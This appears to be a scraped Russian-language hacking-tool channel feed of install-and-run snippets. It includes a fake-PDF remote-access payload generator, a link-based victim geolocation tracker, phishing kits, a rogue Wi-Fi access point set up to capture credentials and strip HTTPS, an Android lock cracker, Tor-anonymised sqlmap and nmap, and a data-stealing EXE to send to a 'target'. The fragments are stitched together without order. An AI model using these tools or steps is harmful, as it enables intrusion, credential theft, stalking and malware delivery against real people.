sudo apt install tor bc firejail$
git clone https://github.com/orjail/orjail$
cd orjail$
sed -i 's/USERHOME=$(getent passwd les | cut -d: -f 6)/USERHOME=$(getent passwd $USER | cut -d: -f 6)/' ./usr/sbin/orjail$
sed -i 's/chown "$USERNAME" "$TORCONFIGFILE"/#chown "$USERNAME" "$TORCONFIGFILE"/' ./usr/sbin/orjail$
sudo make installПроверка своего текущего IP адреса: $
sudo orjail curl suip.biz/ip/Получение содержимого страницы через Tor: $
sudo orjail curl autistici.org > autistici.orgПолучение сайта .onion через Tor: $
sudo orjail curl hacktoolseqoqaqn.onion⚙️ Software | Buratinopol
python mapeye.py -hПосле чего запустится сервер нгрок, и вам необходимо будет скинуть ссылку жертве, и после того, как она перейдет, вы получите следующие данные: долгота, широта, высота, направление, скорость, модель устройства ОС и др. 💾 Скачать
sudo apt-get autocleanЧтобы очистить кеш apt:
sudo apt-get cleanЧтобы удалить неиспользуемые пакеты:
apt-get autoremove ⚙️Software | Buratinopol⚙️Software | Buratinopol
sudo apt install git sudo apt install python3-pipКлонируйте исходный архив в желаемое место на диске
git clone https://github.com/darkoperator/dnsrecon.git python3-pip install -r requirements.txt --no-warn-script-location python3 dnsrecon.py -h⚙️Software | Buratinopol
sudo apt install golang$
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinderИспользование: $
subfinder -h⚙️ Software | Buratinopol
sudo apt-get install net-tools hostapd dnsmasq tcpflow git clone https://github.com/MS-WEB-BN/c41n/ cd c41n sudo bash install.sh sudo chmod +x c41nЗапуск: sudo ./c41n ⚙️Software | Buratinopol
git clone https://github.com/tegal1337/CiLocks.git cd CiLocks chmod +x CiLocks sudo bash cilocks После того, как вы загрузите инструмент, нужно подключить устройство Android к компьютеру с Linux и выбрать нужный вариант взлома.⚙️Software | Buratinopol
git clone https://github.com/TerPackZ/vkmssg cd vkmssg pip install -r reqiurements.txt python vkmssg.pyПолучить токен: https://vkhost.github.io/ ⚙️Software | Buratinopol
git clone https://github.com/4w4k3/Insanity-Framework$
cd Insanity-Framework$
chmod +x insanity.py$
./install.shИспользование: $
sudo python2 insanity.pyПри первом запуске установятся все необходимые зависимости и откроется главное меню. В нём выбираем первый пункт для создания полезной нагрузки. Далее выбираем Fake Acrobat PDF. Вводим ip адрес и порт. В итоге создастся .pdf файл, а программа предложит нам запустить listener, на что мы соглашаемся. Теперь если запустить сгенерированный файл на Windows, в терминале, где запущен listener, откроется сессия, которая позволит удаленно управлять зараженным хостом. ⚙️ Software | Buratinopol
firewall.cpl". 3. Выбираем раздел "Дополнительные параметры" ⟶ "Правила для исходящего подключения". 4. Нажимаем "Создать правило" ⟶ "Для программы" ⟶ указываем путь и ставим галочку ⟶ "Блокировать подключение". 5. Нажимаем "Далее" и нажимаем "Готово".
firewall.cpl". 3. Выбираем раздел "Дополнительные параметры" ⟶ "Правила для исходящего подключения". 4. Нажимаем "Создать правило" ⟶ "Для программы" ⟶ указываем путь и ставим галочку ⟶ "Блокировать подключение". 5. Нажимаем "Далее" и нажимаем "Готово". ⚙️Software | Buratinopol
git clone https://github.com/DeepSociety/STP$
cd STP$
bash install-termux.sh$
bash aiophish.sh⚙️ Software | Buratinopol
▪️git clone https://github.com/P0cL4bs/wifipumpkin3 ▪️cd wifipumpkin3 ▪️ sudo make install
▪️
sudo apt install python3-pyqt5▪️
sudo python3 setup.py installТеперь запускаем WiFi-Pumpkin ▪️
sudo wifipumpkin3После запуска у вас откроется интерфейс wifi-pumkin. Заходите во вкладку Setting и придумайте имя своей точке доступа. Далее в Activity Monitor settings ставьте галочки на HTTP-Requests (веб-запросы), HTTP-Authentication (учётные данные с веб-сайтов) и Pumpkin-Proxy. Во вкладке Plugins (плагины) выберите, что вам нужнее. Pumpkin-Proxy позволяет использовать различные готовые решения (кейлогеры, BeEF, внедрение кода и т.д.) Зато SSLStrip+ в паре с dns2proxy позволяют обходить HTTPS и перехватывать намного больше учётных данных. ⚙️Software | Buratinopol
sudo apt instal tor nmap proxychainsДелаем sqlmap анонимной: 1. Для начала запускаем сам Tor: $
tor2. Теперь мы можем выполнять команды просто дописывая в конец: "
--tor --tor-type=SOCKS5": $
python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5Анонимизируем сканирование nmap: Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains": $
apt install proxychainsПо умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду: $
proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion⚙️ Software | Buratinopol
git clone https://github.com/SpiderLabs/social_mapper.git$
cd social_mapper/setup$
pip install -r requirements.txtИспользование: $
python3 social_mapper.py—help⚙️ Software | Buratinopol
pip install smtplib$
pip install subprocess$
pip install globИспользование: Создайте EXE с помощью этой команды: $
python setup.py build1.Отправьте папку "build" вашей цели. 2. Запустите exe на целевом компьютере. После вы получите данные. ⚙️ Software | Buratinopol